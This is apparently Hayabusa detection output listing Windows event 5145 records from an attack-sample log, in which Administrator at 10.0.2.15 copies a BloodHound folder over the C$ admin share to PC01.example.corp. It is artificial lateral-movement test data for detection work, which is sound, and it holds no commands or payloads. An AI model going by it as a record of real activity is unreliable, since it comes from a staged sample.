2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
